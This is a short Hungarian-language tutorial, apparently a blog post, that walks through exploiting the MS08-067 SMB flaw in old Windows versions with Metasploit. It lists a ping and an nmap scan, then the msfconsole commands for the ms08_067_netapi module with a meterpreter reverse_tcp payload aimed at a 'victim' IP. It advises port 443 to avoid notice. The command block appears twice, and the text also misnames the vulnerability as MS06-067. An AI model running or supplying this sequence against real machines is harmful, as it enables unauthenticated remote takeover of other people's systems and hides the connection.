A sebezhetőséggel a Samba-n keresztül tudunk kódokat futtatni a rendszeren(lényegében bármit). A rendszerek amik ezzel sebezhetőek a következők:
Windows Xp,Windows Server 2003, Windows 2000.
Ezzel a sebezhetőséggel szinte teljesen átvehetjük az irányítást. Egy speciális kérésen keresztül lefuttat egy kódot és így be tudunk jutni a távoli gépbe. Sikeres támadás esetén az SVCHOST.exe összeomolhat ha nem bírja a terhelést... A hiba az egyik kiszolgáltatóban van ami rosszul kezeli a távoli eljárás hívás kérelmeket így hitelesítés nélkül bejuthatunk gond nélkül, ha nem up-to-date a rendszer.
A sebezhetőség kihasználására van a Metasploitban egy modul ami MS06-067 sebezhetőséget használ. Először is pingeljük meg a szervert, hogy online-e vagy nem. Nyiss egy parancssort és írd be:
ping [ip vagy domain] (zárójel nélkül).
Ez után portscanneljünk nmap-el: :)
Ezután írd be, hogy msfconsole vagy msfpro Kali linuxon mind a két parancs működik ha bejön a konzol akkor írd be a következő parancsokat:
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set lhost [ip címed]
set rhost [áldozat ip címe]
set lport 443 (ez lehet akármilyen azért állítsd ismert port számra,hogy ne legyen feltűnő)
exploit
set payload windows/meterpreter/reverse_tcp
set lhost [ip címed]
set rhost [áldozat ip címe]
set lport 443 (ez lehet akármilyen azért állítsd ismert port számra,hogy ne legyen feltűnő)
exploit
Videó:
